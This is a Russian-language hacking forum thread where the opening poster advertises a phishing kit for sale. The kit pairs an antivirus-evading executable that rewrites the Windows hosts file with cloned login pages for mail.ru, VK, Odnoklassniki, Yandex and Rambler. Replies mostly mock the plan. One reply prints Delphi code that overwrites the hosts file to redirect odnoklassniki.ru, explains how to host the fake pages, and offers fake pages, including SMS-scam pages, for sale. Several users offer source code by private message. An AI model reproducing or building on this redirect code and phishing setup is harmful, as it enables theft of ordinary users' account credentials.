![]() |
Оцените программу! (фейк нового покаления)
Программа в стадии разработки!
По факту это фейк нового поколения, раньше нужно было заманивать жертву на фейк огромными усилиями! В данном софте всё ГОРАЗДО ПРОЩЕ! Описание: 1) Программа будет состоять из самого фейка и exe! Начнём с exe: Этот файл НЕ ПАЛИТСЯ АНТИВИРЯМИ..... При запуске этого файла конфиги в винде меняются... и чел который заходит на mail.ru попадает на ваш фейк, а в браузере пишется что он на mail.ru XD Плюсы использования этого файла: 1) Вы ВСЕГДА будете знать пароль и логин жертвы... (поможет избавится от этого только специалист или переустановка Windows) 2) СКРИПТ НЕ ПАЛИТСЯ И НЕ БУДЕТ ПАЛИТСЯ антивирусами! (Если это произойдёт, винда просто перестанет работать) и многое другое! Перейдём к самому фейку: 1) Имеются фейки: mail.ru, odnoklassniki.ru, VK, yandex, rambler.ru (при покупки даются 2 фейка на выбор, последующие 10$ за штуку, изготовление фейка 20$) 2) Фейк выполнен ТОЧНОЙ копией главной страницы, жертва фактически не может ничего заподозрить! 3) Продумывается удобная админка.... 4) При вводе в фейке данных, жертва переносится в её (настоящий) личный кабинет (почту и т.п.) Цена за такое счастье фейкера будет примерно от 100-150$ ЗЫ: "Прога" будет полностью готова через 2-3 недели! Критикуем!) СЕЙЧАС ПРОГРАММА НЕ ПРОДАЁТСЯ!!! (она в разработке) |
Цитата:
|
т.е hosts будет меняться при входе на сайт?
|
Это задумки... половину этих задумок мы с напарником уже выполнили! в частности:
При входе на этот сайт у пользователей (у жертв) будет прописываться в винде пару строк- и теперь когда например человек вбивает в адресную строку (Например) mail.ru, то человек АВТОМАТИЧЕСКИ ПЕРЕХОДИТ НА ВАШ ФЕЙК PS: Не пишим что я кидалово и т.п... если все задумки воплотятся- пройду проверку у модеров (гарантов)! Осталось совсем малость)! |
цена такой полове бан %)
|
Цитата:
|
Оцените программу!
Моя оценка выше, не понимаеш, пропиши в поиске онлайн переводчик и переведи. total90 автор даже не знает где находится файл hosts в окнах, а ты спрашиваеш исходники :rolleyes: в общем ф топку... |
Цитата:
|
Цитата:
собрались инторнет сломать? P.s. ну какое к черту новое покАление... |
Цитата:
Это видите? |
Тип такого?
Немного допилить напильником и будет то, что ты описал. |
Цитата:
PS: и схема работы у нашего продукта совершенно другая! |
Цитата:
Наивные |
1) Все наши секреты рассказывать не будем!
2) Точно не сплойт) |
Лолы, ну вы же понимаете, что такое делается только через сплойт, а пробив даже на полном зиродее больше 50% вряд ли будет?
|
Цитата:
Он через 2 недели пропадет. ТС, можно аську твоего "напарника" в пм? |
Цитата:
|
что оценивать-то?
|
Цитата:
|
Цитата:
|
Цитата:
|
Оке, отпишите мне в ПМ приницп "смены пары строк в файлах при заходе на страничку" и я публично отпишу, какой я незнающий мудак :(
|
Сорри ребят... чёт я буранул со скриптом... XD .exe файл поменяет.... хотя скрипт тоже может, но палевность антивиря высокая!
|
Ололо
|
Цитата:
Беспалевный джойнер будет прилагаться ! или мы сами склеим файлы.... |
ладно- поприкалывались и хватит, я так думаю ТС это вычитал отсюда http://forum.antichat.ru/thread164577.html и ему кажеться что он изобрел крякер инета)))
И надо отдать должное- в той теме на которую дал ссылку ТС не собирался бпрыжить фейком нового поколения))) Цитата:
|
Это совершенно не то.. (я про ту ссылку которую вы дали)
И в преть прошу не обзывать меня барыгой и что я барыжу! окей? Статью я ту первый раз вижу... Всё придумано моим напарником и мной! Если кто то уже такое придумал... Хм) Отлично будем изобретать велосипед! Спросите зачем? Вспомните старые велосипеды на картинках) и новые) есть разница? |
Ну единтсвенно прописывает локальную прокси и ждёт строку:
<form name="Auth" method="post" action="http://win.mail.ru/cgi-bin/auth" style="overflow: hidden;"> |
Цитата:
|
Окей спасибо за совет) Прислушаюсь! Можешь темку закрыть или удалить!
PS: Вот что я хотел услышать) |
Я под столом =) 100-150$ за вот это:
Берите на халяву, антивирь курит. Вот допустим на Delphi такая штука (могут быть ошибки писал прямо тут) program hosts uses windows; procedure feik(); var f:textfile; begin assignfile(f,"C:\Windows\system32\drivers\ect\host s"); rewrite(f); write(f,"127.0.0.1 odnoklassniki.ru"); write(f,"127.0.0.1 www.odnoklassniki.ru"); closefile(f); end; begin feik(); end. Для того что бы это использовать нужен хостинг с выделиным IP, на который перенаправляем запросы домена odnoklassniki.ru. Выделеный IP стоит дороже чем простой хостинг и еще Вас спалят через неделю, и плакали ваши денюжки, потому что фейки запрешенны на простых хостингах. Так же скажу что с mail.ru такая штука не прокатить потому что если у человека установлен Magent то он выдаст сообщение что файл хостс не правельный и исправит его. (проверил лично) Если кому надо такую прогу + фейки (также фейки которы просят отправить смс при входе)+информация о том как все это настроить и не покупать выделенный IP и не боятся за бан на хостинге пишите в ЛС. Цена: "Договоримся". |
Мде.. Программа просто правит файл hosts, ТС, есть полно подробных статей как это сделать + готовые фейки
|
Всё я реально тупанул!!! XDDD
|
Переименуйте тему в тупость нового поколения.
|
Так я и думал, что так все закончится!
|
Тс убейся. Зачем опять барыжить hosts вирусом?
И за такие цены. Тс сумащедший. http://forum.antichat.ru/thread169632.html - можно сказать что исходники :) |
Цитата:
|
|
Мда, я такую вещь за 30 минут сделал=) Кому надо пишите в личку, скину исходник:)
|
Цитата:
|
| Время: 09:45 |